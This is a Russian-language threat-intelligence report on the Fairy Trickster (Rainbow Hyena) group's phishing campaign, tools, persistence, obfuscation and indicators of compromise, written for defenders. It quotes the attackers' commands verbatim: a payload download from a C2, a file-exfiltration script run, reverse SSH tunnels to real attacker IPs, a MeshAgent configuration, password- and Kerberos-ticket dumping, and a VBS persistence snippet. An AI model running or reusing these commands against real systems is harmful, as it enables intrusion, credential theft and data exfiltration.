За последнее время вышло много исследований по группировке Fairy Trickster (Rainbow Hyena) от наших коллег:

[BIZONE] 09.07.2025 (blog)

[PT] 17.08.2025 (habr), 18.08.2025 (blog)

Сегодня мы хотим поделиться нашей частью уникальной информации, связанной с данной группировкой (Fairy Trickster в нашей таксономии), так как тоже наблюдали аналогичную фишинговую кампанию, направленную на наших заказчиков.

  • Помимо описанных коллегами утилит, Fairy Trickster также применяют Socks5 прокси-сервер под названием tsocks и кастомный .NET бэкдор, предоставляющий обратную оболочку и реализующий несколько команд.
  • На этапе постэксплуатации применялась обфусцированная известная отечественная powershell-утилита T1ck3tDump для дампа билетов Kerberos с измененными данными об авторстве.
  • Злоумышленники через PhantomRemote загрузили новую версию PhantomTaskShell, обфусцированную тем же инструментом, что и утилита T1ck3tDump.
  • Обфускация упомянутых утилит очень похожа на обфускацию новых версий BrockenDoor группировки Lifting Zmiy (BO_TEAM). Это позволяет предположить, что группировки могут делиться инструментами (в данном случае обфускатором).

Инструменты с payload-хаба

В ходе дополнительного исследования были обнаружены следующие инструменты на payload-хабе, про который рассказали коллеги из PT:

  • remote.dll — PhantomRShell (PhantomRemote) — начальный бэкдор, рассылаемый в фишинговых письмах;
  • update.ps1 — powershell-бэкдор PhantomTaskShell, который загружался с помощью PhantomRShell;
  • dnsclient.bat — batch-сценарий, реализующий reverse SSH-туннель;
  • hosts.exe —Socks5 прокси-сервер rsocx;
  • XenAllPasswordPro.exe — утилита для восстановления паролей различных программ Windows;
  • wusa.exe — утилита командной строки rclone для управления файлами в облачном хранилище (в атаках использовалось хранилище MEGA);
  • load.ps1 — powershell-скрипт для эксфильтрации файлов с указанными расширениями на жестко закодированный C2;
  • dnsclient64.exe — утилита для удаленного управления хостом MeshAgent.

Конфигурация MeshAgent: 

    
MeshName=ATM
MeshType=2
MeshID=0x427B08875C419B7C3123E5AD72A2B825E018CB99845ED8C735B3661E324997F77C55A9C3B50CDD84DB7F41EF49962D02
ServerID=8BAAFD4F2359964E3C69BED8B2FD17927E09F1CF22B8CF40227A95B4E7C56EEC91BA33BBFC1F1304ABAD81DD42875026
MeshServer=wss://nextcloud.soft-trust.com:443/agent.ashx
displayName=The DNS Client service (dnsclient) caches Domain Name System (DNS) names and registers the full computer name for this computer.
description=Microsoft DNS client
companyName=Microsoft
meshServiceName=Dnsclient
fileName=dnsclient

Но мы также видели и другие неописанные инструменты:

tsocks.exe —Socks5 прокси-сервер tsocks;

cplhost.exe — .NET-бэкдор, который реализует интерактивный cmd-шелл и выполняет несколько команд:

  • load — загрузить файл с сервера управления,
  • dir — выполняется команда dir в командной строке для указанного каталога или текущего, если каталог не указан,
  • whoami — выполняется команда whoami для идентификации текущего пользователя.

Зачем нужны отдельные команды dir и whoami, когда имеется возможность получения интерактивного cmd-шелла — непонятно. Возможно, эти команды — старый код, а в новых версиях бэкдора добавили интерактивный шелл.

Особенности постэксплуатации

После получения первоначального доступа через фишинговые письма, которые приводили к запуску PhantomRShell, через который в дальнейшем загружался PhantomTaskShell, злоумышленники приступали к выполнению различных команд постэксплуатации.

Команды, исполняющиеся на клиентах, можно разделить на несколько групп.

Первая группа — разведывательные команды: 

    
whoami
arp -a
Get-Service
dir C:\\ProgramData
dir c:\\users\\user\\downloads
nslookup
netstat -ano
wmic logicaldisk get caption

С их помощью атакующие собирают различные данные о целевых системах жертвы.

Вторая группа — команды для загрузки и запуска различных дополнительных инструментов и утилит: 

    
// загрузка архива с инструментом для эксфильтрации файлов с указанными расширениями
 iwr -Uri "http://<C2_IP>:80/load.zip" -OutFile "C:\\ProgramData\\load.zip"
 // распаковка архива
 expand-archive -force -path C:\\ProgramData\\load.zip -destinationpath C:\\ProgramData\
 // запуск эксфильтрации файлов
 powershell -ex bypass C:\\ProgramData\\load.ps1 -Path C:\\Users\\<username> -r -e "xls,xlsx,doc,docx,txt,ovpn,rdp,lnk"

Команды представлены с исходным форматированием и синтаксисом.

Злоумышленников интересовали различные документы, картинки, файлы vpn- и rdp-конфигураций, lnk-файлы открываемых пользователем приложений и документов. Ниже приводим обобщенную информацию, собранную из выполненных команд. 

    
// Расширения, собираемые злоумышленниками:
 -r -e "pdf,xlsx"
 -r -e "xls,xlsx,doc,docx,txt,ovpn,rdp,lnk"
 -r -e "pdf,xls,xlsx,doc,docx,txt,jpg,ovpn" 
 // добавлены rdp, lnk
 -r -e "pdf,xls,xlsx,doc,docx,txt,jpg,ovpn,rdp,lnk"
 // добавлен png
 -r -e "pdf,xls,xlsx,doc,docx,txt,jpg,png,ovpn,rdp,lnk"
 
 // Пути, из которых эксфильтровывались файлы:
 C:\Users\
 C:\Users\<username>\
 C:\Users\<username>\Desktop

Злоумышленники загружали архивы с XenArmor, инструментом для эксфильтрации файлов с указанными расширениями и MeshAgent.

Для обхода NAT и сетевых СЗИ, блокирующих входящие соединения, атакующие осуществляют обратный проброс портов по SSH, что позволяет им подключаться к зараженной системе и взаимодействовать с ней через указанный удаленный порт на relay-хосте.

Мы обнаружили команды для построения SSH-туннелей на порты, отличные от рассмотренных в статье PT, что показывает высокую частоту смены этих портов и работу операторов вручную: 

    
ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 54279-p 443 vtvvuaweuvefafoewfau9124124615@195.133.32.213
ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 53325 -p 443 cfyvg84df17842o@185.130.251.227

Содержимое dnsclient.bat: 

    
@echo off
start /b "" "C:\Windows\System32\OpenSSH\ssh.exe" -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 33541 -p 443 cfyvg84df17842o@185.130.251.227

Для сбора различных аутентификационных данных злоумышленники использовали утилиту XenArmor, которая использовала такой же лицензионный файл, о котором рассказали коллеги из PT ESC: 

    
C:\ProgramData\XenAllPasswordPro.exe -a C:\ProgramData\<hostname>.html

Также были обнаружены попытки запуска скрипта с говорящим названием «o_kerberos.ps1»: 

    
powershell -ex bypass C:\\ProgramData\\MicrosoftAppStore\\o_kerberos.ps1

При первых запусках скрипт блокировался антивирусным ПО, после чего злоумышленники обфусцировали его собственным обфускатором (подробнее про него далее) и предприняли повторную попытку запуска. Она завершилась с ошибкой, причем в вывод попали первые строки содержимого файла o_kerberos.ps1.

Ошибка запуска утилиты T1ck3tDump и характерная обфускация
Ошибка запуска утилиты T1ck3tDump и характерная обфускация

По ним удалось определить, что скрипт представляет собой инструмент T1ck3tDump из GitHub-репозитория PowershellKerberos, который позволяет выгружать билеты Kerberos из кеша LSA.

Еще одной интересной деталью стало то, что строка подписи автора скрипта была изменена на строку Lee Mao (https://github.com/anonymous_sudan), которая может отсылать к хакерской группировке Anonymous Sudan. При этом сходства в тактиках и техниках группировок Fairy Trickster и Anonymous Sudan или каких-либо других отсылок не обнаружено.

Особенности закрепления PhantomTaskShell

Эксперты PT ESC рассказали, что PhantomTaskShell закрепляется через создание задачи планировщика. Мы хотим подробнее раскрыть, как именно это происходит.

Закрепление выполняется через дополнительный файл — путем создания vbs-файла $PSScriptRoot\run_update.vbs: 

    
Set WShell = CreateObject("WScript.Shell")
WShell.Run "powershell.exe -NoProfile -ExecutionPolicy Bypass -File ""$PSScriptRoot\update.ps1""", 0, False

Он как раз и запускается задачей планировщика — $PSScriptRoot\run_update.vbs.

Новая версия PhantomTaskShell и связь с Lifting Zmiy

В ходе нашей эмуляции заражения PhantomRShell в режиме honeypot злоумышленники загрузили с его помощью новую версию бэкдора PhantomTaskShell. Мы считаем, что это новая версия по нескольким причинам:

  • Добавлен новый код.
  • Изменены имена файлов и задачи.
  • В отличие от PhantomTaskShell, обнаруженного на payload-хабе, обфусцирован таким же обфускатором, который использовался для обфускации powershell-утилиты T1ck3tDump (файл o_kerberos.ps1), рассмотренной выше.

Подробнее по пунктам.

Новый код

Новый код (выделен) в новом образце PhantomTaskShell
Новый код (выделен) в новом образце PhantomTaskShell

Новый код добавил следующую функциональность:

  1. В самом начале создает рабочий каталог C:\ProgramData\Yandex Packages (в старой версии каталог не создавался).
  2. Реализована проверка наличия своего же файла скрипта $($PSScriptRoot)\update.ps1 до запуска остальных действий. Если скрипт не существует — завершить выполнение.

На первый взгляд это действие может показаться странным — зачем проверять существование самого себя? Но, скорее всего, этот шаг может быть расценен как техника антианализа. Например, после запуска скрипт может быть удален антивирусом. Такая проверка обнаружит, что самого файла скрипта нет, и сразу завершит работу, не оставляя других следов (в виде создания задачи планировщика и так далее).

Изменение имен файлов, каталогов и задач

Изменения жестко закодированных имен
Изменения жестко закодированных имен

Злоумышленники изменили следующие жестко закодированные значения:

  • Имя файла для сохранения ID жертвы.
  • Имя файла журнала для записи выполняемых действий.
  • Имя vbs-файла и задачи планировщика, используемые для закрепления.
  • Описание задачи планировщика.

Эта информация может быть полезна для защитников, так как показывает, какие параметры злоумышленники меняют для обхода от обнаружения.

Обфускация

Злоумышленники обфусцировали PhantomTaskShell для обхода средств защиты:

  • Заменены все имена переменных и функций на ${__[A-Z]_[0-9][a-z]} (примеры можно увидеть на рисунках выше).
  • В строки вставлены разделители |, а в самом начале одно- или двухбуквенные сокращения слов из строки, например, V|VBS created:${__B_8m}.

Похожую обфускацию строк начали использовать Lifting Zmiy в мае 2025 в семплах BrockenDoor (примеры в таблицах ниже). Это может указывать на то, что группировки Fairy Trickster и Lifting Zmiy используют один и тот же обфускатор.

Старые версии

Новые версии

Loaded ClientId: $ClientId

L|ClientId loaded:${__A_4r}

Created VBS script: $vbsFile

V|VBS created:${__B_8m}

Scheduled task created: $taskName

T|Task created:${__D_5n}|User:$($env:USERNAME)

Sending result: $status

SR|Sending result:${__P_5m}

Skipping empty command

SC|Skipping empty command

Script execution completed

F|Script execution completed

Обфускация строк в PhantomTaskShell группировки Fairy Trickster

Старые версии (конец 2024)

Новые версии (май 2025)

set_poll_interval

spi

run_program

rp

self_destruct

sf

exec_command

ec

shell_exec

se

create_process

cp

win_exec

we

cmd

cm

system

sy

powershell

ps

ShellExecute returned code < 32: %lld

ShEx returned code < 32: %lld

WinExec returned code <= 31: %d

WE returned code <= 31: %d

Обфускация строк в BrockenDoor группировки Lifting Zmiy

Странное совпадение или реальная связь между группировками? Время покажет.

Выводы

Группировка Fairy Trickster (Rainbow Hyena) располагает не самыми сложными, но достаточно эффективными инструментами и методами. Их основные цели — это сбор разнообразной информации (начиная от файлов и документов и заканчивая аутентификационными данными Windows и различных сервисов), а также получение максимально полного объема сведений о сетевой инфраструктуре жертвы и доступах к ней, возможно, с целью последующей продажи этой информации на теневых форумах.

Наше исследование показало, что в арсенале Fairy Trickster имеется еще несколько инструментов, и что злоумышленники используют различные методы Defense Evasion для обхода средств защиты. При этом похожая обфускация применялась и группировкой Lifting Zmiy. Это может означать, что и те, и другие, как минимум, обмениваются или используют общие инструменты, а может, и что-то большее.

В связи с тем, что главным вектором проникновения является фишинг, для предупреждения заражения следует:

  • Регулярно организовывать обучение по цифровой безопасности, уделяя особое внимание распознаванию фишинговых сообщений и методов социальной инженерии.
  • Использовать решения для защиты почты — Secure Email Gateway.
  • Использовать антивирусное ПО и регулярно обновлять базы вирусных сигнатур.

IOCs

File Hashes

MD5

1947B7E7855667219334AC4BA511CE2E
8413C5156AF3741CF9BDA4C1A398298B
FC6D2FC336DE9F974A0BF27E506D79D3
D71BB4387DA469AA01D4208034F0EC3A
38DAA3CD309376F3CCDC60C7EB332DAF
CD915C6D6CB455FB2786CB4E2DEBDAFC
F4A3D72628A1E1CD5F8BD4E705A78022
FD2C7190238E09B066B212717AC4DB64
783525C868E85BBE2872177055750814
E2B2631DB1BA76EE8EC5D18BA5175BD8
22B24714B5908AC7EEBA05487DEC9D76
C9D9620334D5EC58A4573623A977F6EE
6C3EBC9DAD2A108792A001ACA5E59763
0A7DF52C84D9CD46C5C7C1153929A3D1
50AB56A1FC33A6185FB9003A262D2EC9
A8992F817BACC4A01211D40D951DC0AC
46AD80C437B8EADC1F72B209C2160B32
CF2210D49EF5B3D219E4D0C962C5E0E8
04F1AFDEB99129552927BA931238D2D7
C6258A3B2C6A0BEA57B36CED383EC775
81B6D93DC4AB7248B8BA0A66D4FCE560
159A6CDA60CCBA16C1DB275EC6251C3F
FF6BA80443630289C6201D51950D7C9D
108CD0F50D2EAF4B12975053CF216BBB

SHA1

7964120CD684E7F001A655F5C5DE224C8DA42A13
DE94DD78691175B4110B6B7BDAC3831CE7A32B1F
BDEA783F447B49349213906F38450CEB87EC682A
CDB8306C4602DF53A8200054DDDC5FCBA23DBA50
9F8F60E2C3C33EDE923BE622DD60F623A064E6DD
5FE6AE13ED4D0B3302A023CD81EED28252B8E166
58B01BA209EB5F8BF99A46BE4BAB9D39084B3593
28513F343F4A0A857FE9314D2B68B8E2E2B35B83
B5C8DB9A6C645469BCF4582DFD7F66050206579F
8C1DDA2DDC8CDCD24D5F06FBF1BA0570D58E26A5
74502CF86498D4FBEE9FB1C1FDD5DFE94CB7B09B
CA92192D9DD75E0A389800F9DF107221741CD98B
CE5F4A560DAA677993F7EC319B1A5116CF35AEDA
8967440ED45C6B53F9E146A644D73A431F560591
06DFC1F34C6CA753A847455C6BE5C8472C0B0FB1
D3DD5668D996B4574ABCA3A7D025842DDC72935A
BA42C5E22991472408E46FA67789A99282B2B377
7D3EE309DC267ACDF806837B06D76C473DE8C92B
FB0EBF2CFE7C7B9AC8710EE61CA9D6318981B906
3F85C5A959C41B7481D8E0370FC594F12266ED13
6F92C047E8A7F5730E2B2FAF9F78E5F1F2D9860C
59F2989259F857F57501B33C39231D3127075EA2
1CDCD766868507379778E11942CC53756335F3FD
ED09B09D005634A1DC17812274963BD06E5B9989

SHA256

FBDE1D8FDB5F66FC6E61E2FE6896BCFFFFFEAF6AE68B8C7D19F1078C76BA41AF
5736B3F21666968E388C1E49DA42A1FCBBD6A3B5C8F0CBFE5BE486208B396957
EA54123D430337271F7B6E03AEA653AF817CEA20A64FA6AA082F44CA2B01C2DB
EBEF31DF330554290F519DB3F16BB4EFB326F2C9D6B93601EA3C67D2374F3A7A
8F4A3E22D0C988EE8574392533DA8B9256F79C87770820E1EC530D3B9DBD9FCD
D7D6894C2FBCE3D91AF8DE50E7CD649F12627D94A1A9B430F6E583714D48BE29
D6B3645C750D1DDE284C1B88011F4B89F4987DC2A248C2CCD54A8516F75616C3
4619CEF20C15D0FDEE44FABACCF93916F53A02971D5C87CFD30FAABFFF57309E
5540F27F12DB5A9E954727079665A282F905A0BE787B76D798CA79A318D197F5
D42D16E11947A1ED548FD2F23B4D9226D3282BADECF8F254E4DA747A8659A60D
C97F7A2F09B5F17D1C1CED5EED68946DC8D4A7A2B3116A806AB29E29717C16B9
9B2866063B0F5E2E72CBC60FB5B0B267F03B1E0F47EF71A10C2DF63B1B5C67DA
7DA87F51E939400C473B77945F0F1E8950847AEABF2BECC76B0FBE26E46ED7A4
2D886A2F0F5E96346A560AF06654B9B04D1755E683CE6397EE5B46F183FB4996
CCAEE012D7DDED1E58F8D8C20E0A26F7CD16D337539E131E238FC2B2E77A2D04
A5B7AF0B5FAAFECF3B9ED135D728C726C652DEEED5DD8AC72148536C488378A1
B478664D0BB1DD1BEA7B30136BE4CB4E7CA1DA6C1ECA55817B557B9E4C5097EC
2A0D5C3A17E5C7FEE3D7A798DCC2D3D81688A05092D709B177AFDDCDF0096DB5
FB2C943BA8BABBD5EC0C210093ACEBBBE642FB83A4A09FA0FE427ACB599EF13D
E21C4B8A7FD4673410F395ACC0963A80064EE9831A600DBED469A7E02123FFAD
9880988BFF19825504313ECA505B0A4192BFB757A4A4DBE33AB40543CFED8B64
C504D1A6CE6B08488F2F8D07F6F397D8EE14DF00982BE7C6E2D6E28111018630
E5406942CE12DEBAE0F6720E5DC4DCB2C80B032FB8ED260D313AF3C695336318
C3985A240ABD9A0A59BA51AAB48F6263BA92C2450CBA2537513C55F2FB942523

Сетевые индикаторы

PhantomRShell (PhantomRemote)

185.225.17[.]104
91.239.148[.]21

PhantomTaskShell

185.255.133[.]195
185.130.251[.]116

.NET-бэкдор

185.130.251[.]219

MeshAgent C2

nextcloud.soft-trust[.]com

Серверы, на которых создавались Reverse SSH-туннели

185.130.251[.]227
195.133.32[.]213

load.ps1 (эксфильтрация файлов из директории)

185.130.249[.]224

Адреса загрузки вредоносных утилит (payload-хаб)

188.127.254[.]234

Приложение 1. Расширенная информация по файловым IOCs

Путь

Хеш-сумма MD5

Хеш-сумма SHA1

Хеш-сумма SHA256

Комментарий

update.ps1

1947B7E7855667219334AC4BA511CE2E

7964120CD684E7F001A655F5C5DE224C8DA42A13

FBDE1D8FDB5F66FC6E61E2FE6896BCFFFFFEAF6AE68B8C7D19F1078C76BA41AF

PhantomTaskShell
Рабочая директория:
C:\ProgramData\YandexCloud\
Task Name:
SystemAdminAgent_<ClientId>
C2:185.130.251[.]116:80

update.ps1

8413C5156AF3741CF9BDA4C1A398298B

DE94DD78691175B4110B6B7BDAC3831CE7A32B1F

5736B3F21666968E388C1E49DA42A1FCBBD6A3B5C8F0CBFE5BE486208B396957

PhantomTaskShell
Рабочая директория: C:\ProgramData\Yandex Packages\
TaskName: YandexSoftwareService_<ClientId>
C2:185.255.133[.]195:80

dnsclient.bat

FC6D2FC336DE9F974A0BF27E506D79D3

BDEA783F447B49349213906F38450CEB87EC682A

EA54123D430337271F7B6E03AEA653AF817CEA20A64FA6AA082F44CA2B01C2DB

Batch-сценарий, инициирующий проброс портов:
C2:185.130.251[.]227

cplhost.exe

D71BB4387DA469AA01D4208034F0EC3A

CDB8306C4602DF53A8200054DDDC5FCBA23DBA50

EBEF31DF330554290F519DB3F16BB4EFB326F2C9D6B93601EA3C67D2374F3A7A

.NET-бэкдор

C2:185.130.251[.]219:80

dnsclient64.exe

38DAA3CD309376F3CCDC60C7EB332DAF

9F8F60E2C3C33EDE923BE622DD60F623A064E6DD

8F4A3E22D0C988EE8574392533DA8B9256F79C87770820E1EC530D3B9DBD9FCD

MeshAgent

C2: wss://nextcloud.soft-trust[.]com:443/agent.ashx

hosts.exe

CD915C6D6CB455FB2786CB4E2DEBDAFC

5FE6AE13ED4D0B3302A023CD81EED28252B8E166

D7D6894C2FBCE3D91AF8DE50E7CD649F12627D94A1A9B430F6E583714D48BE29

Socks5 прокси-сервер rsocx

load.ps1

F4A3D72628A1E1CD5F8BD4E705A78022

58B01BA209EB5F8BF99A46BE4BAB9D39084B3593

D6B3645C750D1DDE284C1B88011F4B89F4987DC2A248C2CCD54A8516F75616C3

Cкрипт для отправки по HTTP содержимого директории
C2: 185.130.249[.]224:80

tsocks.exe

FD2C7190238E09B066B212717AC4DB64

28513F343F4A0A857FE9314D2B68B8E2E2B35B83

4619CEF20C15D0FDEE44FABACCF93916F53A02971D5C87CFD30FAABFFF57309E

Обратный Socks5 прокси-сервер tsocks (хэш совпадает с файлом tsocks.exe из репозитория)

wusa.exe

783525C868E85BBE2872177055750814

B5C8DB9A6C645469BCF4582DFD7F66050206579F

5540F27F12DB5A9E954727079665A282F905A0BE787B76D798CA79A318D197F5

rclone — утилита командной строки для управления файлами в облачном хранилище

License.XenArmor

E2B2631DB1BA76EE8EC5D18BA5175BD8

8C1DDA2DDC8CDCD24D5F06FBF1BA0570D58E26A5

D42D16E11947A1ED548FD2F23B4D9226D3282BADECF8F254E4DA747A8659A60D

Лицензионный файл XenArmor

XenAllPasswordPro.exe

22B24714B5908AC7EEBA05487DEC9D76

74502CF86498D4FBEE9FB1C1FDD5DFE94CB7B09B

C97F7A2F09B5F17D1C1CED5EED68946DC8D4A7A2B3116A806AB29E29717C16B9

Исполняемый файл XenArmor

XenManager.dll

C9D9620334D5EC58A4573623A977F6EE

CA92192D9DD75E0A389800F9DF107221741CD98B

9B2866063B0F5E2E72CBC60FB5B0B267F03B1E0F47EF71A10C2DF63B1B5C67DA

XenArmor DLL

remote.dll

6C3EBC9DAD2A108792A001ACA5E59763

CE5F4A560DAA677993F7EC319B1A5116CF35AEDA

7DA87F51E939400C473B77945F0F1E8950847AEABF2BECC76B0FBE26E46ED7A4

PhantomRShell (PhantomRemote)
C2: 91.239.148[.]21
Адрес загрузки PhantomTaskShell: 185.225.17[.]104

x.zip

0A7DF52C84D9CD46C5C7C1153929A3D1

8967440ED45C6B53F9E146A644D73A431F560591

2D886A2F0F5E96346A560AF06654B9B04D1755E683CE6397EE5B46F183FB4996

Архив, содержащий XenArmor

wusa.zip

50AB56A1FC33A6185FB9003A262D2EC9

06DFC1F34C6CA753A847455C6BE5C8472C0B0FB1

CCAEE012D7DDED1E58F8D8C20E0A26F7CD16D337539E131E238FC2B2E77A2D04

Архив, содержащий rclone

update.zip

A8992F817BACC4A01211D40D951DC0AC

D3DD5668D996B4574ABCA3A7D025842DDC72935A

A5B7AF0B5FAAFECF3B9ED135D728C726C652DEEED5DD8AC72148536C488378A1

Архив, содержащий PowerShell-бэкдор

tsocks.zip

46AD80C437B8EADC1F72B209C2160B32

BA42C5E22991472408E46FA67789A99282B2B377

B478664D0BB1DD1BEA7B30136BE4CB4E7CA1DA6C1ECA55817B557B9E4C5097EC

Архив, содержащий tsock

remote.zip

CF2210D49EF5B3D219E4D0C962C5E0E8

7D3EE309DC267ACDF806837B06D76C473DE8C92B

2A0D5C3A17E5C7FEE3D7A798DCC2D3D81688A05092D709B177AFDDCDF0096DB5

Архив, содержащий PhantomRemote

one.zip

04F1AFDEB99129552927BA931238D2D7

FB0EBF2CFE7C7B9AC8710EE61CA9D6318981B906

FB2C943BA8BABBD5EC0C210093ACEBBBE642FB83A4A09FA0FE427ACB599EF13D

Архив, содержащий

XenArmor

load.zip

C6258A3B2C6A0BEA57B36CED383EC775

3F85C5A959C41B7481D8E0370FC594F12266ED13

E21C4B8A7FD4673410F395ACC0963A80064EE9831A600DBED469A7E02123FFAD

Архив, содержащий load.ps1

hosts.zip

81B6D93DC4AB7248B8BA0A66D4FCE560

6F92C047E8A7F5730E2B2FAF9F78E5F1F2D9860C

9880988BFF19825504313ECA505B0A4192BFB757A4A4DBE33AB40543CFED8B64

Архив, содержащий rsocx

dnsclient64.zip

159A6CDA60CCBA16C1DB275EC6251C3F

59F2989259F857F57501B33C39231D3127075EA2

C504D1A6CE6B08488F2F8D07F6F397D8EE14DF00982BE7C6E2D6E28111018630

Архив, содержащий MeshAgent

dnsclient.zip

FF6BA80443630289C6201D51950D7C9D

1CDCD766868507379778E11942CC53756335F3FD

E5406942CE12DEBAE0F6720E5DC4DCB2C80B032FB8ED260D313AF3C695336318

Архив, содержащий dnsclient.bat

cplhost.zip

108CD0F50D2EAF4B12975053CF216BBB

ED09B09D005634A1DC17812274963BD06E5B9989

C3985A240ABD9A0A59BA51AAB48F6263BA92C2450CBA2537513C55F2FB942523

Архив, содержащий cplhost.exe

o_kerberos.ps1

-

-

-

dumper.ps1:
утилита T1ck3tDump для дампа билетов Kerberos